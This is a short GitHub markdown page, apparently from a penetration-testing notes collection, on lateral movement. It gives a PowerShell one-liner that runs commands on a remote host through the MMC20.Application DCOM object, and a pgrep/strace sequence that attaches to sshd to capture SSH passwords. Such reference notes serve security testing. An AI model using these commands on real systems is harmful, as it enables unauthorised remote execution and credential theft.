Skip to content

Latest commit

 

History

History
33 lines (23 loc) · 1.52 KB

4.4-Lateral-Movement.md

File metadata and controls

33 lines (23 loc) · 1.52 KB

4.4 Lateral Movement

Table of Contents

Lateral Movement via DCOM

"$a=[System.Activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Application.1','<RHOST>'));$a.Document.ActiveView.ExecuteShellCommand('cmd',$null,'/c echo <TEXT> > C:\<FILE>.txt','7')"

Sniffing SSH Passwords

$ pgrep -l sshd
6235 sshd
$ strace -f -p 6235 -e trace=write -o capture

Previous

Next